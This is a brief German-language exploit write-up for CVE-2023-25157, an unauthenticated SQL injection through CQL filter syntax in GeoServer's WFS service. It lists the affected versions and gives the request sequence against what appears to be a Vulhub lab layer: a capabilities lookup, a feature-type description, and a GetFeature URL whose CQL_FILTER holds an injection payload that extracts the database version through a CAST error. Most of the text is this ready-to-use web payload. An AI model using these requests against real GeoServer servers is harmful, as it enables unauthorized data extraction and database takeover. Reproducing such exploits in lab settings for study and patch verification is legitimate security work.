
Exploit für CVE-2023-25157: SQL-Injection im GeoServer-WFS-Dienst über manipulierte CQL-Filter-Syntax, die nicht authentifizierte Remote-Datenextraktion und potenzielle Kompromittierung des Datenbankservers ermöglicht.
Da keine Filterung der Benutzereingaben erfolgt, können nicht authentifizierte Angreifer eine fehlerhafte Filtersyntax konstruieren, die lexikalische Analyse von GeoServer umgehen und so eine SQL-Injection durchführen. Dies ermöglicht den Zugriff auf vertrauliche Informationen auf dem Server und möglicherweise die Übernahme der Datenbank-Server-Berechtigungen.
GeoServer 2.20.x < 2.20.7
GeoServer 2.19.x < 2.19.7
GeoServer 2.18.x < 2.18.7
GeoServer 2.21.x < 2.21.4
GeoServer 2.22.x < 2.22.2
Suche
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

Feature-Name – zugehörige Attribute abrufen
vulhub:example/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true



